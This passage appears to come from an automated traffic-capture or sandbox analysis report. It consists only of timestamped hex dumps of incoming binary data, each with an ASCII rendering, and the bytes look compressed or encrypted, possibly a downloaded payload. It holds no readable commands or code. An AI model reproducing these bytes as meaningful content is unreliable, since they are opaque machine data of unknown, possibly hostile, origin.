                                                                                                                                                2022-09-29 12:51:33 UTC10755INData Raw: 6a 24 77 6d dd ee a9 92 a3 b0 40 d0 e0 e3 3d 3f 04 77 e9 1a 83 f7 a4 a7 91 52 49 04 27 b6 79 c5 e1 15 69 68 a9 9e 49 19 19 e7 19 62 e5 55 f1 1d 0d b0 90 e5 17 1d 36 34 c1 9c 39 ff 92 08 bb 81 f9 7e ff a5 3e 7c ac 0e 1d 2c 71 23 8d b1 82 05 70 8e 97 82 61 e2 49 84 1e 9a ec 6f 1e 74 91 38 45 12 62 87 d7 fc a7 ef 85 d8 71 55 be 26 6c 81 c2 ca 26 36 30 32 ac 91 56 0c 26 23 43 a5 9b be a6 3f 02 49 d9 0c a3 f9 f4 3f 3c 4a 4c 60 d9 6f ae 3b 31 d5 c9 c3 ef 9e 55 5e 99 76 40 6c cf c3 18 1b 05 7a e8 8c 3a 69 19 67 59 ed 31 df ae bd 8f 06 00 cc 58 9f 2d d0 c8 03 af 1d 24 5a 8b 78 c4 3b 48 53 db c7 a2 95 28 a4 22 d2 77 a6 c7 a2 30 08 68 20 94 6d df 47 35 df 03 72 18 c9 21 76 ca 2f a7 1f 86 ab 1f 1f ce cd 77 25 25 5a 55 b8 34 7f d6 21 02 1c 0d a7 2a 2f 26 5a d3 67 07
                                                                                                                                                Data Ascii: j$wm@=?wRI'yihIbU649~>|,q#paIot8EbqU&l&602V&#C?I?<JL`o;1U^v@lz:igY1X-$Zx;HS("w0h mG5r!v/w%%ZU4!*/&Zg
                                                                                                                                                2022-09-29 12:51:33 UTC10771INData Raw: 1b 42 e8 8a e8 d3 d2 aa 07 18 15 f9 56 e6 2d 1f cf 21 ee 97 f0 4f cd 56 d5 3c 2e 54 9e 3c 70 d8 7c 0d 9a 51 79 36 3e 4f 2a 42 0c 00 8f 79 a4 79 dc 4a 56 81 4d 60 df b1 ad 7a b4 9f 3b ad 33 96 e7 23 49 01 be bb b6 4f d5 5a ce 28 a3 26 04 50 48 cf 03 d8 36 38 57 08 18 b1 7b 20 f5 09 c4 ed 84 db 95 36 8e de 14 df c7 2a 11 8e 9d 72 bc cd c6 67 db ed a3 f7 46 3b 40 bd 9b 66 62 79 15 ee 2e d1 06 e4 5f d7 f8 86 e6 37 30 b6 bf 24 22 4a a5 c9 83 9c 5a f4 f5 00 20 13 ea 75 52 f0 69 52 6a 55 e6 73 bb e7 2e 1d 79 d7 3a 18 cb a0 29 5f f1 82 0d 4b ab f6 5c e1 a3 b6 d1 b0 d5 57 44 00 c0 f8 b7 6b b9 6c 57 3a 42 95 be 4f cf 27 2b c4 c9 24 ca 1c 8d 55 65 5a f3 78 0a d6 d2 12 dd de c4 eb a9 24 9d 1f c4 c3 15 bf 57 92 5e 9c 18 ca aa ed 16 40 38 75 83 71 08 32 80 c4 ad c4 18
                                                                                                                                                Data Ascii: BV-!OV<.T<p|Qy6>O*ByyJVM`z;3#IOZ(&PH68W{ 6*rgF;@fby._70$"JZ uRiRjUs.y:)_K\WDklW:BO'+$UeZx$W^@8uq2
                                                                                                                                                2022-09-29 12:51:33 UTC10787INData Raw: 5d ce e3 99 e0 92 09 8a a0 27 72 d0 c6 40 ec 7c 14 98 b2 20 d0 de d2 59 67 8d 82 4d 32 c2 56 b0 af 39 c3 50 07 30 18 89 2d 52 66 60 1a 6e 75 a0 3e bf c6 90 aa d3 4e 72 ba d3 8a 1e f5 84 92 58 15 bf a6 9d 6b 8c e1 b9 c7 60 0a 04 d2 09 11 e7 13 1f 56 52 67 9b d7 fb e0 5d ce 83 19 1f 80 4a db 17 54 79 9f c3 b7 42 68 c6 25 6c ad e5 ad da 8a c0 1c 62 f8 5f 7b 3f c3 c9 59 23 c4 ca b2 5b f2 d3 84 a1 24 89 fa f0 1a 76 30 18 9b f5 8e fb 59 fe 29 69 ce 58 ec fb af b7 83 37 d8 92 cf 2b c1 bd 12 44 5e 6e 9e 93 d7 f5 4a ff 5c cd 61 bd 37 3b 57 cd 61 80 97 c1 64 20 01 00 5b 30 19 a8 96 b4 13 83 be e7 15 98 e7 b3 b2 ff 8a 04 4e a8 a1 0b 25 a7 ba 9d b7 75 86 72 54 9a 2e 89 a4 58 45 e5 40 35 4b 53 ed 6a 39 d6 f4 ca 4d 30 2f ad c6 1c af 2e 4e 13 a8 0b d4 aa 71 64 0e 72 41
                                                                                                                                                Data Ascii: ]'r@| YgM2V9P0-Rf`nu>NrXk`VRg]JTyBh%lb_{?Y#[$v0Y)iX7+D^nJ\a7;Wad [0N%urT.XE@5KSj9M0/.NqdrA
                                                                                                                                                2022-09-29 12:51:33 UTC10803INData Raw: 03 cf 90 b0 b8 a9 62 80 bf 6a e1 ee c1 40 d4 19 65 44 92 c5 70 06 00 00 fd f8 f0 4c d1 46 65 9c b8 0e 1c c9 b9 c0 d6 de 12 0f 06 52 57 8a 22 e1 60 33 e6 87 12 7c bf a8 24 a2 57 17 53 94 0d 5b a0 78 7b f0 24 97 78 cd 59 72 15 05 c3 cc c1 2c 26 18 39 99 79 95 70 07 72 e1 9c 10 8d 91 0e e0 77 1f 3d 6c 8f ed 7f 22 ce c6 2a eb dc 61 fd 31 0e d7 9c c5 a5 97 17 ca d5 0f 59 08 3b 0e 87 1e aa b9 2c cc 9c 93 c6 3e 79 21 c3 db 7d 51 8b 4c 5f 60 a8 de f3 bb a2 cb 3a aa 09 ca 8d 8c 52 28 43 72 7c 67 fb 90 a8 33 37 ea df 81 78 06 f4 68 89 bc e7 65 ae 37 c3 d2 17 97 27 c0 09 89 ba 6a d2 b3 5e 61 62 24 78 3d 27 92 81 b6 f8 53 82 e8 7c 7e f0 18 82 b0 70 5a 2e f2 bb 98 70 19 e0 5e 6f ee 88 66 aa 61 aa f9 06 35 12 55 9d 41 4e af b1 93 9f 8b 52 71 66 75 b4 cf f4 b0 56 df e1
                                                                                                                                                Data Ascii: bj@eDpLFeRW"`3|$WS[x{$xYr,&9yprw=l"*a1Y;,>y!}QL_`:R(Cr|g37xhe7'j^ab$x='S|~pZ.p^ofa5UANRqfuV
                                                                                                                                                2022-09-29 12:51:33 UTC10819INData Raw: 52 77 a3 fe 10 5e 0f 43 6a 5a 03 4d e7 7e ea c8 0a ec fa 58 53 d3 72 4e 24 7b 85 de d9 3a a2 38 21 15 69 26 d4 02 d0 96 5e d6 ba ef 2b 33 d5 86 58 76 20 6e a4 74 c2 57 a1 51 37 f7 fa ed 01 a6 61 85 77 9c 4f 92 6a 41 82 ce 49 82 56 2c 07 22 48 0e ac a4 be de 9e 29 7a 59 99 6a da 64 4a a9 3a 8d 6c df 6e df bc 5f 20 d0 f6 29 40 13 a8 cc 32 02 47 24 42 a4 7d 63 de af 64 74 f5 7a 36 07 44 15 a4 fe ff ef 35 84 eb 35 42 2a 0a 62 9b 4a 2b 9b 45 15 67 88 d6 cc 0b a4 08 5e ca 47 80 87 96 93 a9 62 62 5f 34 f6 61 d2 3a 39 c9 5a 48 85 d9 ab c8 fa 7b 13 21 dd 43 49 d9 84 a3 9a 08 0e df 73 5e ab ec 24 b8 5f c7 63 db 2e 62 e8 d2 0d 20 16 fe 62 cf 25 fc 55 2c 3e 14 a9 22 cc 51 7b 38 46 52 f1 f8 97 bc c2 62 a5 45 e3 3e 5b 97 fc da 52 69 6a 19 a8 49 24 bf 8e ac 69 90 cc 59
                                                                                                                                                Data Ascii: Rw^CjZM~XSrN${:8!i&^+3Xv ntWQ7awOjAIV,"H)zYjdJ:ln_ )@2G$B}cdtz6D55B*bJ+Eg^Gbb_4a:9ZH{!CIs^$_c.b b%U,>"Q{8FRbE>[RijI$iY
                                                                                                                                                2022-09-29 12:51:33 UTC10835INData Raw: 6a ff 7f d5 91 3e fd 49 96 e7 25 74 04 12 e6 93 70 9e f7 5a 2c 2d 3e 40 23 e4 ac a6 10 10 cc 57 86 b5 91 32 ce 20 e4 63 4e 13 22 42 49 45 ca 0c e1 0e d1 62 00 25 cc b6 42 85 4e 2d fc e3 10 53 c7 fa ad 3d 4f d8 7e 3b 0c 26 52 3e ca e0 f8 c4 f6 7b 38 fe ba 54 e8 13 b4 ef fa 6a d1 8b 7c 3e ba 9f fc 71 82 fa 3c df 19 14 7b b6 2e 3b c8 46 3d 91 ee 12 0a 42 2f 53 2f cf 2d 34 30 0e 4a 09 4b c1 00 f4 83 0d e9 2f 02 2c 23 b8 a2 86 17 03 11 c4 b8 fc 7f 78 dc 0f b3 9c b9 46 1b 33 89 86 77 1d fd a2 df 5f 76 e3 be a5 21 23 f7 58 c6 72 f4 3c a2 25 70 8b 42 43 bf 16 bc 91 5f f7 a4 af f8 16 8b eb bc a2 3b 20 e2 0f 90 55 5d 15 7d 23 59 6d 31 1c 39 62 c8 f7 24 e7 c1 ea 82 e9 f2 e8 0c d6 82 f3 34 fe d2 09 ff b7 65 75 ad 25 1f 23 6a 4d a4 0e 42 e9 33 b9 83 e4 79 04 80 09 86
                                                                                                                                                Data Ascii: j>I%tpZ,->@#W2 cN"BIEb%BN-S=O~;&R>{8Tj|>q<{.;F=B/S/-40JK/,#xF3w_v!#Xr<%pBC_; U]}#Ym19b$4eu%#jMB3y
                                                                                                                                                2022-09-29 12:51:33 UTC10851INData Raw: 2c 0d 18 67 1b ac d9 62 79 d3 91 6d ae 8f 5f 27 4f 7b 73 36 90 76 b5 67 aa 6f b4 f3 43 0b 80 ff 9d 80 cc 23 78 2b 5d b3 54 ad 32 11 cd 51 c9 9b be fc 8f 2f 8f 87 6c 2f 3f 3d 25 2e 47 1a 7d 9e 1f 42 98 12 a6 13 75 ff e9 1e 00 02 70 e6 7b a7 f9 83 e1 23 3e 54 68 5e fa ee ad 73 9e 3e 21 2a ca c8 35 b8 d0 0d 86 e5 4c b6 6a 7a 09 48 19 78 87 af 20 6d 15 c0 f9 2b 8b a6 22 70 8a fd 46 a1 ee fe cc 5e c0 df 3a b6 49 13 d3 6a bd 5b 7a df a2 17 bc aa 8b 60 cb 77 fa 96 c2 ea 09 31 1f f1 c6 a3 a6 e8 e6 48 43 61 0f 38 67 97 ce 14 b7 96 84 22 5a 93 5a c3 e0 58 80 bf c4 40 df 9b 30 63 c7 4b 61 4d 6e 93 07 8e ed 7b 0e 7a 7e 75 e0 2f 83 d8 40 68 34 48 58 ce 62 a6 93 68 c9 db 0b 2c 8e 1f bd cd da 83 66 e6 36 4f 88 f9 22 4a 85 a2 7c 44 9b bf db c8 82 3c ca 03 c8 4b e7 6a 4d
                                                                                                                                                Data Ascii: ,gbym_'O{s6vgoC#x+]T2Q/l/?=%.G}Bup{#>Th^s>!*5LjzHx m+"pF^:Ij[z`w1HCa8g"ZZX@0cKaMn{z~u/@h4HXbh,f6O"J|D<KjM
                                                                                                                                                2022-09-29 12:51:33 UTC10867INData Raw: 70 c4 6b 51 26 05 e3 20 52 92 3d fc 2d a0 2e 72 ee 5c ab 55 6b b3 11 0d 60 ca 4a bf 1e fd d6 04 5d 0f 06 9c ef 20 6b 5f 41 17 6f 80 d8 ac b2 06 c9 b8 73 10 26 ab cb f1 79 c4 4a 48 72 9a 1c 55 6f fb f2 26 db fa 9c 7e fd 11 01 be ef ff 31 0c c6 f7 0b 76 e3 22 bf b5 67 89 30 12 d3 20 07 ec ea a4 94 1a c2 04 c0 14 c2 b9 b8 60 d9 f6 fd 01 13 1d 6d 02 e5 f6 77 64 0e b5 d7 1b a1 8d 0a af 30 58 5f 6c 08 25 7a da bd d4 1c 4b 21 ed 42 ff 0e 29 c3 8f fc 02 f7 de 78 2b 8b 5f 33 8d 94 b7 ba 0b 3d 18 f1 89 c8 07 34 fe c7 10 f9 5f 41 30 03 fc 86 f6 47 31 39 99 75 60 12 33 a9 6d 13 7b d0 0e 0d 45 e4 68 9c d7 9c 64 6a b2 23 e0 75 10 cc b9 50 18 bb 27 3b 2a 5c 22 4f b6 c2 32 35 da f6 a4 f1 9d 1c c4 6f 28 76 db 5d ee 0b a2 95 50 6e 21 eb 9e bf e6 bd 3b 41 83 f6 e7 6e 8d 05
                                                                                                                                                Data Ascii: pkQ& R=-.r\Uk`J] k_Aos&yJHrUo&~1v"g0 `mwd0X_l%zK!B)x+_3=4_A0G19u`3m{Ehdj#uP';*\"O25o(v]Pn!;An
                                                                                                                                                2022-09-29 12:51:33 UTC10883INData Raw: 46 77 f1 10 52 36 fb bc 95 42 3f f2 0c 98 47 de 3e 77 88 29 1c fb ac 9d bd a9 d6 01 16 47 25 a6 30 2b 37 03 0c 21 01 fc 99 9a 17 bb 18 a2 2a 79 2f 79 eb 4a 58 a1 61 9b ef 2f c1 f5 05 0b 1b 4c 32 a6 80 3f f8 20 be 73 38 a7 bc d1 a5 6d 31 bf 42 8d 99 f6 ad 4e 13 48 48 92 65 1e 9d c3 d2 13 2b 2a ff 27 cd 31 d5 d4 2e bf 26 f4 a5 34 68 89 ab 1f 4d 56 ac 74 f2 cc 07 7e 3c ed c9 e4 b2 6e 12 ff e4 65 a2 d3 c5 91 23 dd dc 5f 9a bb 7f ab c8 db 85 62 a7 89 37 2c 7c fd 3e d0 c4 50 81 30 56 a1 88 57 1a f0 47 76 26 25 3a 24 30 fe 1f ed ba 45 ae 69 43 b9 fa 49 91 5f 7f c4 bb e8 4b 5f 62 7e 7f a6 21 0d e2 9b 9f 8f 28 ff 0d ed 1b e7 4a 39 71 09 93 fe 77 42 c6 9b 17 f9 7f b8 5a 7e 96 81 6f 6f 26 b8 6a af dc f8 1e 20 5c 78 97 f7 4e a3 cc e7 21 ce 68 3e ce cc 78 80 61 be 81
                                                                                                                                                Data Ascii: FwR6B?G>w)G%0+7!*y/yJXa/L2? s8m1BNHHe+*'1.&4hMVt~<ne#_b7,|>P0VWGv&%:$0EiCI_K_b~!(J9qwBZ~oo&j \xN!h>xa
                                                                                                                                                2022-09-29 12:51:33 UTC10899INData Raw: 45 d9 c7 e8 7c e2 62 3a 19 71 cf 8d 82 62 fe 72 1e 1a 75 1d 2d e9 1c 8e 79 a5 8a 9f 03 48 ee f6 07 3f 93 df b8 8b 5c d7 c8 35 89 ae 2c 8d a5 6f 05 55 e0 f3 9c e1 bb 18 18 d7 03 19 99 76 47 5e ba 6f a7 74 d7 b5 f2 6e 8a 68 76 98 7b fb 3b c3 6a 15 54 f8 f6 d7 f7 1e fd 08 95 c2 f1 65 63 75 2e d6 be 88 99 54 fb 1b 5d c6 96 d0 3a 81 8e bc bb 24 81 90 18 f6 10 67 2a 63 64 c7 cd 8d 57 28 97 35 20 fe eb e6 c0 10 ef 7e 5b f1 50 91 b4 7a 73 2f 3d a5 0c 8a 8f b9 a3 81 08 f9 0d c6 19 67 66 52 25 c1 9d cc d1 5f 19 e9 c9 61 a6 a2 61 4b 8c 31 14 38 57 28 d6 84 61 a5 dc 65 80 36 a2 09 f5 d2 de 6e 59 9e c8 31 47 72 8f dc b3 13 54 66 95 b6 46 e4 97 e4 83 71 b3 47 a6 85 d2 c5 ec 36 51 39 0b 58 be 36 a2 fb 83 e0 81 b3 70 2d ba ea 4f 68 5b 0c 7a 38 b1 46 b6 14 ff d4 27 7e ff
                                                                                                                                                Data Ascii: E|b:qbru-yH?\5,oUvG^otnhv{;jTecu.T]:$g*cdW(5 ~[Pzs/=gfR%_aaK18W(ae6nY1GrTfFqG6Q9X6p-Oh[z8F'~
                                                                                                                                                2022-09-29 12:51:33 UTC10915INData Raw: ac 9c 49 91 14 ca ba c3 33 b9 eb 4e 16 b8 66 db af 2f 14 92 7a db 73 69 80 9a e2 cb a2 57 1e 7d ff 17 47 0d 78 a4 a3 da 2b ed a4 97 45 39 1b b8 8b 25 c8 a7 31 4a aa 9f 5f fd c7 a3 a4 07 0d 01 54 0c ef 30 71 5b 59 b2 12 9e ee 01 47 51 1b eb 56 25 7f c4 d9 d1 d0 1b ea 32 7b a6 5a f5 ec 6e e4 fd 47 d0 d9 af 43 09 87 ff 52 0a 5d c7 02 0f 14 11 6d 71 30 e7 c8 06 20 12 07 a8 1c 70 09 fe 98 e7 d3 57 a9 e7 ef 9e ed 97 db 72 79 9a af bb d3 5e df 3b d2 44 be b7 3a 45 80 38 7c e0 dd 8b 83 a5 97 dc 1e 33 34 ad bc cd 08 0f e4 f2 1f 28 99 17 d4 df df 19 47 f8 78 0e 26 73 6a ef c9 b4 21 4a 7f b9 a3 cc 10 6d c2 59 ef 46 c4 77 67 3b 24 2e 32 02 7d 1a 8e 39 01 8b f4 9d af 6b ac e8 c9 43 d7 27 f7 92 ea 40 32 4b 13 b3 4c e5 0d cc 82 69 fc f7 2b bb 75 89 c7 ad b4 73 6d cd b1
                                                                                                                                                Data Ascii: I3Nf/zsiW}Gx+E9%1J_T0q[YGQV%2{ZnGCR]mq0 pWry^;D:E8|34(Gx&sj!JmYFwg;$.2}9kC'@2KLi+usm
                                                                                                                                                2022-09-29 12:51:33 UTC10931INData Raw: 9b ff 8c 72 4c d5 47 88 33 b1 dc 23 90 d7 3f 96 be 4c 5f aa ea 33 67 b2 e5 1c f8 81 10 c2 fb e1 63 ff 0f 7d 86 f6 2f 12 c0 02 2a 87 20 ec 2e 1d 2e 15 f3 cb f8 0a c8 3f 0d f5 52 14 48 2f 14 a0 52 f7 74 a0 b8 f3 87 5a 9f 93 94 f9 74 2f a3 e1 b0 d0 cb 33 d9 0e 58 e9 40 eb b0 59 af 2a e4 8b 40 cd cd f1 ff ff f8 9c 51 0c 9b 21 95 84 cc 73 c1 42 51 03 49 f4 ef c8 f5 60 1c e2 57 9c 30 69 ef ae 7b 45 99 28 2a ff 77 18 18 83 ef 91 ec ca 21 b2 b8 19 e5 a7 2d cc fe 23 89 96 75 3e 32 a5 11 b1 42 2b 9a d4 95 22 88 80 21 1d d5 08 c0 a5 2d ce 27 2f 4d 83 46 c3 7e 21 04 75 69 bd 1e 5e b1 ef 8e fc 2e e3 43 ed 47 e5 50 cb 28 69 59 93 68 10 be dd 2f 1a 47 8e 7b ef 7a 8b 77 c2 a6 f0 52 4a 18 fe 4d c2 b9 f1 1c 62 68 3c 5e 4f eb 1c 0b 2c d3 87 af 4c 8a 47 6e 4e 49 ba 1f c2 04
                                                                                                                                                Data Ascii: rLG3#?L_3gc}/* ..?RH/RtZt/3X@Y*@Q!sBQI`W0i{E(*w!-#u>2B+"!-'/MF~!ui^.CGP(iYh/G{zwRJMbh<^O,LGnNI
                                                                                                                                                2022-09-29 12:51:33 UTC10947INData Raw: e7 2f 65 c0 2b 76 6e fd c7 93 a8 33 c8 6d 57 58 a1 b3 52 b7 20 fa c0 57 38 cb bf 56 3c b0 bb 04 7b 3d bb 7d 45 34 45 20 f3 ee b2 46 ed d2 70 64 0c 6f d9 a7 30 e8 18 c1 8b 5a 55 42 95 33 50 c7 1e ab 89 1a 5c 67 3b 74 fe 7c 4b e1 82 8c b6 f9 0e 47 93 bf 49 7d 89 73 58 8e 4f 21 9c a9 4e ef b3 ec 02 18 9e af 95 a2 c8 88 59 b6 5e 62 c0 45 54 82 16 8a 64 f6 ba b7 fa dd 07 4f 17 87 71 c2 e2 45 20 36 1c df f5 49 06 e2 2a 81 7f da d0 03 20 9d a5 7f cb 73 28 7e a2 52 24 6e 25 c7 7a 45 8a 62 f2 b0 61 13 cb f1 d1 ff a9 4c 99 b1 46 14 88 8e 34 63 05 92 a7 6a 2b 18 24 4e a6 75 bb fc 03 2e fe 2b 40 8c 62 96 ce b1 a6 80 e4 43 fa c4 39 fc 07 50 b1 d3 91 a0 b0 a7 73 c8 9d 81 df 19 58 97 8c 7f d3 bb a5 2c 28 ae 77 dc 30 e1 90 1c 0d 65 c3 41 f2 44 c5 f5 90 04 4f b7 bd 1d 72
                                                                                                                                                Data Ascii: /e+vn3mWXR W8V<{=}E4E Fpdo0ZUB3P\g;t|KGI}sXO!NY^bETdOqE 6I* s(~R$n%zEbaLF4cj+$Nu.+@bC9PsX,(w0eADOr
                                                                                                                                                2022-09-29 12:51:33 UTC10963INData Raw: 06 17 da 70 33 ee b1 99 12 51 b3 a2 fc c3 85 94 95 63 e6 3e 20 9d bc 23 d2 0b 85 b1 a0 bf 84 90 59 3a d3 55 a2 0a 40 ba 53 15 a5 e9 e6 76 c0 49 72 e3 0d 5e ed 14 be 74 13 a1 a3 48 fe d4 b4 21 05 8e ef 9e 04 52 5b 34 9f 3f 25 48 b1 a8 59 17 c1 14 7b 5b 19 8c d4 5a 89 46 f0 18 6f 3e 7b f8 96 01 a6 e1 ae ad 15 bb 38 0f 0d 70 1b 17 47 b2 39 68 41 50 7a 48 7d c6 92 0b e9 6f 2e 49 55 b1 b6 76 fe 0e 2d a3 34 3e 6a 96 17 03 6b 69 0f 8b 2f 48 05 b7 01 d2 ab 61 4a 5b e6 88 ba d1 51 cf 76 be 6c e4 17 38 01 7b d2 d2 0a c0 c7 af ff cf 50 87 7b d6 bd 12 bf 86 d0 2d 3c 4b 5d c4 83 2b 7f 16 ea 40 7f fc e9 ea 81 6b 33 d3 7f ce 30 f5 28 bd 8e 2d 27 6a c7 36 f8 99 a2 fc f3 be ab 14 02 b2 cd 11 9c 84 a2 16 8f 94 07 c2 50 80 ff 24 76 53 e4 ca c1 80 c8 56 08 18 ca b3 ea e9 11
                                                                                                                                                Data Ascii: p3Qc> #Y:U@SvIr^tH!R[4?%HY{[ZFo>{8pG9hAPzH}o.IUv-4>jki/HaJ[Qvl8{P{-<K]+@k30(-'j6P$vSV
                                                                                                                                                2022-09-29 12:51:33 UTC10979INData Raw: 12 5b 29 be ef 9e 3e 65 99 34 80 4c 6e e7 e5 6d 9c 50 65 08 83 e9 f0 8b af 62 89 04 7f 8c 4c 4d f8 27 0a a5 d6 6e 90 7f 65 e5 b9 e9 0d 56 03 6e 7f ad 24 fa 4d 94 1d a1 90 6f 58 ed 6c f3 23 50 1c 5b 62 78 1b 80 a1 5f fe 6d e7 87 9f 7a ef 5e 4f 8e 32 ec 07 64 8d e3 37 4a f7 7a 0a 8e 2e b0 78 28 8b b4 0a 11 12 c2 9d 8d 00 93 79 61 88 8f 57 78 47 c2 5a fb b8 a5 2d dc 41 a6 59 e4 8c dc 3a 77 64 87 bd 21 4a 7d 1e 83 15 41 10 6c 76 d2 60 80 73 bd 33 5b 77 72 b4 a2 26 e3 20 5a ad b6 b5 a0 9a a2 44 1c b5 0c e2 93 a7 fc f1 59 df 43 1d 3f a9 78 33 66 fe ab 15 02 dd 37 3d db 13 32 68 54 d3 03 c9 ae 7f 99 8b b4 0a 2c dd 13 d6 5f 20 2c 8a 97 e9 a8 c0 2d 2c 62 a9 f0 71 32 2e 40 87 93 a2 15 59 41 8d 7d 4a a8 95 e4 73 a9 b8 3b bd 75 ed a4 69 cf 06 5e 16 e3 e0 15 39 b4 da
                                                                                                                                                Data Ascii: [)>e4LnmPebLM'neVn$MoXl#P[bx_mz^O2d7Jz.x(yaWxGZ-AY:wd!J}Alv`s3[wr& ZDYC?x3f7=2hT,_ ,-,bq2.@YA}Js;ui^9
                                                                                                                                                2022-09-29 12:51:34 UTC10995INData Raw: 45 ec 64 08 c0 21 a4 eb a3 a3 0a f1 4c e4 58 7a c4 96 9e 1b ab 42 35 d2 b4 75 18 93 bc e6 3e 36 cd 36 ad 22 f0 42 18 60 9a 09 c6 0a 18 35 c2 8b f0 dc 1e 44 86 27 62 d3 ff 55 1f 39 22 3b 2e 9e b1 0e 27 c4 c0 45 38 c2 6f 8a 10 e0 7f 70 79 3d 1c bb e9 d5 7a 60 1d 5d 1f 61 d5 46 53 e9 0f aa cd 49 9d 5e e8 5d 50 96 da 50 b8 bd de 17 65 05 99 e8 90 3a 6b 33 1e bc 19 e3 15 c8 49 e9 3a 15 6c 00 9e 72 3e f1 2c 67 dc 98 39 e0 76 da 65 78 39 7b 62 da ed 39 ff 10 e1 c2 2f af 6d 15 a2 62 b4 0b b9 0d 1c d4 66 68 4d 6a c7 19 b0 7a 5a 3f a9 15 23 cd d2 e8 0d fb 90 be 65 a9 87 77 5c cd 12 7a 01 3d 25 09 fa a2 cd f6 62 6b 53 e3 a6 95 7a 1e 6d e7 df 16 d2 48 99 02 dc f9 27 2a a5 81 3f 91 61 34 d6 93 00 70 00 86 38 92 ab 44 f1 a2 15 7e 62 e8 66 43 bb da de 89 e1 83 c8 2f dd
                                                                                                                                                Data Ascii: Ed!LXzB5u>66"B`5D'bU9";.'E8opy=z`]aFSI^]PPe:k3I:lr>,g9vex9{b9/mbfhMjzZ?#ew\z=%bkSzmH'*?a4p8D~bfC/
                                                                                                                                                2022-09-29 12:51:34 UTC11011INData Raw: 76 93 b8 c4 a7 17 1a 43 d8 39 fa c6 21 8b 20 13 be d8 0a 6a e9 49 6f 5b be 12 40 c2 29 1c 38 a7 d5 b2 e9 20 b3 bd c8 93 2d 79 53 c3 2e d3 5d ba 74 db e8 f9 56 ff 61 33 a4 68 c0 24 6a 8e 57 6a 77 f1 c5 ea c8 d0 e5 6f 22 47 49 63 64 68 bf 80 8a b0 bf 8a c2 84 ba 32 21 4b 07 5a d5 0d 3b 1a da 70 e9 d3 04 1f 75 a5 99 f2 9a 5e 7d e0 40 db 24 37 9e 6d 2e b5 0f 26 c2 67 6e b8 3b e3 d2 60 99 7a f9 65 32 14 00 8b 5a c5 50 ff ee 1d 06 c0 34 54 6c 04 a0 c3 3a 5d fd 36 3e 67 f6 8b ec bf 5a d1 7d e9 2a 0f 92 f0 55 3c 7f ce 16 da 2e 70 ae 67 dd 74 81 ac 4a d2 8c 5d 4b 6a da 72 6f 50 cc 7c cf 68 ea ac 94 92 4d 28 7f 8d 36 db b3 9a 1f 35 71 f6 7d 88 3e a3 17 4d 75 f3 ef 87 1b 47 82 01 85 62 43 8a 8c 73 20 61 d2 f6 ff 0d 0d 87 45 8b 12 79 ea 84 d1 be 74 93 48 ab 6f bd 38
                                                                                                                                                Data Ascii: vC9! jIo[@)8 -yS.]tVa3h$jWjwo"GIcdh2!KZ;pu^}@$7m.&gn;`ze2ZP4Tl:]6>gZ}*U<.pgtJ]KjroP|hM(65q}>MuGbCs aEytHo8
                                                                                                                                                2022-09-29 12:51:34 UTC11027INData Raw: 7b b5 22 b7 b2 6e b4 27 59 65 e3 08 98 27 e7 a3 ba 0e 99 6e d3 70 f1 5c 80 0e ad 8a a8 a0 8b 7b b0 51 fa 46 4f 72 e8 ea 43 d0 1c 3b 02 04 6d 05 45 50 ba 8e 93 07 9e c2 53 38 3c 8f 7d 57 e0 d2 33 a0 f3 4d ac f9 b4 bd 57 41 c3 d1 0b d9 e0 d9 e1 b0 72 48 1b cc c6 d3 e1 b4 3e 60 9f d2 fb e9 d3 a6 83 4b 25 b1 f5 4b d7 fb 81 27 9c 46 5b 46 87 89 03 cf f8 b6 6d a4 af 44 62 1b 05 3a 86 89 12 04 81 da 8e a2 62 63 16 2b 33 82 24 b0 f4 b7 a9 6f dd f2 e4 07 38 fc f4 c6 dc fe 80 b7 65 eb 36 2f d7 35 45 ca 32 24 1f 65 d8 18 c0 41 4f d5 83 10 25 25 84 c8 23 fe f9 1c 57 07 4f 57 7c 25 63 fd ba 7b 0c f9 6b 8a 17 c2 9b 06 d6 a0 98 b7 df 26 7a b4 07 e7 be 01 99 03 00 7c 97 f9 3e 05 d2 06 a1 8c 8c de cc bb bf 8b 33 03 ac 60 0a cc ea 8a a6 58 e2 0d 4c cb 3b 0b d0 32 b1 67 8d
                                                                                                                                                Data Ascii: {"n'Ye'np\{QFOrC;mEPS8<}W3MWArH>`K%K'F[FmDb:bc+3$o8e6/5E2$eAO%%#WOW|%c{k&z|>3`XL;2g
                                                                                                                                                2022-09-29 12:51:34 UTC11043INData Raw: 34 22 f4 58 4e 0a 94 d7 1c 5c fe b3 88 50 60 e4 5b 00 24 71 d8 df e3 e4 cb 4b 7f ba 6b f6 ee 49 9d 3f 2a 03 5f 37 ea 6f 76 ff 34 81 93 1e 17 40 2b 6f 58 4d 1b 66 c0 17 3f 2f e9 38 7e 34 48 fa 10 b4 87 9a 60 65 42 71 4e 72 11 65 f4 ed 89 1b ae 22 21 56 33 65 b3 7e ca 94 b6 51 e1 9b 93 59 80 ad f7 ff 08 b1 d9 c6 1c 24 ce 65 05 7e 2a f9 6e c5 64 05 71 aa 78 8b a8 51 e1 bb f6 db 37 cd 0e 3c 4b 1e 39 9d 36 ed 36 ee 0b 5a ee 4b 1c 44 e1 9c 35 7a 3d 03 3e ca ff da 98 61 b7 b2 de 69 ee e1 11 2f ed 90 c1 f2 2d d3 b0 21 ea fc c1 e6 92 07 48 73 07 08 07 c7 dc 4d c6 a3 cb 4b 6f 2a 89 5f 61 07 38 b0 0f 99 f2 21 76 ee 33 3b c2 19 c0 bb 69 26 79 63 06 ee dd c7 95 52 b8 42 4c ad 50 5b 27 32 f3 3e 8b 95 cb 99 41 d4 21 88 98 75 27 e7 da 00 dd 8c 23 9f d9 23 83 7e 25 fc e9
                                                                                                                                                Data Ascii: 4"XN\P`[$qKkI?*_7ov4@+oXMf?/8~4H`eBqNre"!V3e~QY$e~*ndqxQ7<K966ZKD5z=>ai/-!HsMKo*_a8!v3;i&ycRBLP['2>A!u'##~%
